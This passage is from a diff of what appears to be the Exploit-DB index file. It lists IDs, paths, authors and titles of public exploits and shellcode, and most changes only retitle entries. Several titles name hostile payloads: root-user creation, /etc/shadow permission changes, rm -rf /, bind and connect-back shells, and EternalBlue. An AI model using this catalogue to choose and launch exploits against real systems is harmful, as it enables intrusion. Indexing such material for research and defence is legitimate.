GmbH",linux,dos,0 33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",windows,dos,0 33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos,0 @@ -4336,7 +4336,7 @@ id,file,description,date,author,platform,type,port 34364,platforms/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos,0 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0 -34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 +34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 @@ -9131,6 +9131,7 @@ id,file,description,date,author,platform,type,port 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -12597,9 +12598,9 @@ id,file,description,date,author,platform,type,port 21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0 21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0 21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,novell,remote,0 -21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 +21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 -21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 +21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",multiple,remote,0 21650,platforms/windows/remote/21650.txt,"Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow",2002-07-25,"Cesar Cerrudo",windows,remote,0 21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6 / Microsoft ISA Server 2000 / Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTcast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,multiple,remote,0 @@ -12759,10 +12760,10 @@ id,file,description,date,author,platform,type,port 21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0 21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",multiple,remote,0 21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0 -21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0 +21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0 21947,platforms/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,unix,remote,0 21948,platforms/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,unix,remote,0 -21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0 +21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0 21958,platforms/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",windows,remote,0 21959,platforms/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",windows,remote,0 21964,platforms/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0 @@ -13352,7 +13353,7 @@ id,file,description,date,author,platform,type,port 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 -24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 +24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0 @@ -13704,7 +13705,7 @@ id,file,description,date,author,platform,type,port 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)",2013-05-30,xis_one,windows,remote,0 25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0 -25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 +25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow (Metasploit)",2013-05-31,Metasploit,windows,remote,8001 26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution",2005-09-20,"eter Zelezny",linux,remote,0 25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,windows,remote,0 @@ -15392,8 +15393,8 @@ id,file,description,date,author,platform,type,port 38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)",2015-12-15,Metasploit,jsp,remote,8020 38983,platforms/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,java,remote,8080 39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0 -39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 -39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 +39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 +39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0 @@ -15620,7 +15621,7 @@ id,file,description,date,author,platform,type,port 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 -42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 +42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 @@ -15656,7 +15657,7 @@ id,file,description,date,author,platform,type,port 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0 42011,platforms/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Buffer Overflow (SEH)",2017-05-15,Tulpa,windows,remote,0 -42030,platforms/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445 +42030,platforms/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445 42022,platforms/windows/remote/42022.rb,"Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)",2017-05-17,Metasploit,windows,remote,0 42023,platforms/windows/remote/42023.rb,"Serviio Media Server - checkStreamUrl Command Execution (Metasploit)",2017-05-17,Metasploit,windows,remote,23423 42024,platforms/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,php,remote,0 @@ -15689,8 +15690,8 @@ id,file,description,date,author,platform,type,port 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0 -42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 -42306,platforms/linux/remote/42306.txt,"NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,remote,0 +42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 +42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15736,14 +15737,14 @@ id,file,description,date,author,platform,type,port 13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode",2008-08-31,sorrow,generator,shellcode,0 13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode (Encoder/Decoder)",2008-08-04,"Avri Schneider",generator,shellcode,0 -13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0 +13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Protected Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0 -13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - flush iptables rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 +13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0 13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 @@ -15754,7 +15755,7 @@ id,file,description,date,author,platform,type,port 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0 13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 -13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 +13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0 13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 @@ -15765,13 +15766,13 @@ id,file,description,date,author,platform,type,port 13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - chmod(_/etc/shadow__666) Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - Bind 8000/TCP + Execve Iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind 8000/TCP + Add User with Root Access Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - Bind 8000/TCP ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0 13320,platforms/lin_x86-64/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86-64,shellcode,0 13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding + busybox Launching Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0 -13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 -13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl script execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 -13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - file reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0 +13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 +13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 +13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - File Reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0 13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod(_/etc/shadow__666) + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 @@ -15796,7 +15797,7 @@ id,file,description,date,author,platform,type,port 13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0 13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User 'r00t' Without Password To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 @@ -15829,14 +15830,14 @@ id,file,description,date,author,platform,type,port 13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0 13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 -13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 +13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode (+1 Encoded) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 -13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 @@ -15867,16 +15868,16 @@ id,file,description,date,author,platform,type,port 13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid/execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0 13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric using IMUL Method Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0 13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0 13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind 5074/TCP (ToUpper Encoded) Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0 -13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes)",2004-09-26,"Matias 